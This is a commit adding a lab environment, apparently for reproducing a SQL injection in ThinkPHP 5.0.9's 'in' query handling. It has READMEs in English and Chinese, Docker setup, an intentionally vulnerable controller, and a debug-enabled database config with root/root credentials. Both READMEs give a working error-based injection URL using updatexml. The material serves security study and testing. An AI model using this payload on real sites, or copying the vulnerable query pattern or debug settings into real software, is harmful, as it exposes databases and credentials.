first commit

thinkphp/in-sqlinjection/README.md

@@ -0,0 +1,32 @@
+# ThinkPHP5 SQL Injection Vulnerability && Sensitive Information Disclosure Vulnerability
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+## Rationale
+
+Details to read the references：
+
+- https://www.leavesongs.com/PENETRATION/thinkphp5-in-sqlinjection.html
+- https://xz.aliyun.com/t/125
+
+## Environment Setup
+
+Enter the following command:
+
+```
+docker compose up -d
+```
+
+Visiting `http://your-ip/index.php?ids[]=1&ids[]=2`, you'll see the username is displayed, indicating that the environment is running successfully.
+
+## Exploit
+
+Open the page `http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1`，you will find messages revealed successfully：
+
+![](01.png)
+
+And you can find the account and password of the database through the debug page.
+
+![](02.png)
+
+This is another sensitive information disclosure vulnerability.

thinkphp/in-sqlinjection/README.zh-cn.md

@@ -0,0 +1,30 @@
+# ThinkPHP5 SQL注入漏洞 && 敏感信息泄露
+
+运行环境：
+
+```
+docker compose up -d
+```
+
+启动后，访问`http://your-ip/index.php?ids[]=1&ids[]=2`，即可看到用户名被显示了出来，说明环境运行成功。
+
+## 漏洞原理
+
+漏洞原理说明：
+
+- https://www.leavesongs.com/PENETRATION/thinkphp5-in-sqlinjection.html
+- https://xz.aliyun.com/t/125
+
+不再赘述。
+
+## 漏洞利用
+
+访问`http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1`，信息成功被爆出：
+
+![](01.png)
+
+当然，这是一个比较鸡肋的SQL注入漏洞。但通过DEBUG页面，我们找到了数据库的账号、密码：
+
+![](02.png)
+
+这又属于一个敏感信息泄露漏洞。

thinkphp/in-sqlinjection/docker-compose.yml

@@ -0,0 +1,18 @@
+services:
+ web:
+   image: vulhub/thinkphp:5.0.9
+   depends_on:
+    - mysql
+   ports:
+    - "80:80"
+   volumes:
+    - ./www/controller:/var/www/application/index/controller
+    - ./www/model:/var/www/application/index/model
+    - ./www/database.php:/var/www/application/database.php
+ mysql:
+   image: mysql:5.5
+   environment: 
+    - MYSQL_ROOT_PASSWORD=root
+    - MYSQL_DATABASE=cat
+   volumes:
+    - ./www/init.sql:/docker-entrypoint-initdb.d/init.sql

thinkphp/in-sqlinjection/www/controller/Index.php

@@ -0,0 +1,17 @@
+<?php
+namespace app\index\controller;
+
+use app\index\model\User;
+
+class Index
+{
+    public function index()
+    {
+        $ids = input('ids/a');
+        $t = new User();
+        $result = $t->where('id', 'in', $ids)->select();
+        foreach($result as $row) {
+            echo "<p>Hello, {$row['username']}</p>";
+        }
+    }
+}

thinkphp/in-sqlinjection/www/database.php

@@ -0,0 +1,51 @@
+<?php
+// +----------------------------------------------------------------------
+// | ThinkPHP [ WE CAN DO IT JUST THINK ]
+// +----------------------------------------------------------------------
+// | Copyright (c) 2006~2016 http://thinkphp.cn All rights reserved.
+// +----------------------------------------------------------------------
+// | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 )
+// +----------------------------------------------------------------------
+// | Author: liu21st <liu21st@gmail.com>
+// +----------------------------------------------------------------------
+
+return [
+    // 数据库类型
+    'type'           => 'mysql',
+    // 服务器地址
+    'hostname'       => 'mysql',
+    // 数据库名
+    'database'       => 'cat',
+    // 用户名
+    'username'       => 'root',
+    // 密码
+    'password'       => 'root',
+    // 端口
+    'hostport'       => '',
+    // 连接dsn
+    'dsn'            => '',
+    // 数据库连接参数
+    'params'         => [],
+    // 数据库编码默认采用utf8
+    'charset'        => 'utf8',
+    // 数据库表前缀
+    'prefix'         => '',
+    // 数据库调试模式
+    'debug'          => true,
+    // 数据库部署方式:0 集中式(单一服务器),1 分布式(主从服务器)
+    'deploy'         => 0,
+    // 数据库读写是否分离 主从式有效
+    'rw_separate'    => false,
+    // 读写分离后 主服务器数量
+    'master_num'     => 1,
+    // 指定从服务器序号
+    'slave_no'       => '',
+    // 是否严格检查字段是否存在
+    'fields_strict'  => true,
+    // 数据集返回类型 array 数组 collection Collection对象
+    'resultset_type' => 'array',
+    // 是否自动写入时间戳字段
+    'auto_timestamp' => false,
+    // 是否需要进行SQL性能分析
+    'sql_explain'    => false,
+];

thinkphp/in-sqlinjection/www/init.sql

@@ -0,0 +1,13 @@
+USE `cat`;
+
+CREATE TABLE IF NOT EXISTS `user` (
+  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
+  `username` varchar(255) NOT NULL,
+  `password` varchar(255) NOT NULL,
+  PRIMARY KEY (`id`)
+) AUTO_INCREMENT=1 ;
+
+INSERT INTO `user` (`username`, `password`) VALUES
+('admin', 'admin');
+INSERT INTO `user` (`username`, `password`) VALUES
+('test', 'test');

thinkphp/in-sqlinjection/www/model/User.php

@@ -0,0 +1,9 @@
+<?php
+namespace app\index\model;
+
+use think\Model;
+
+class User extends Model
+{
+    protected $table = 'user';
+}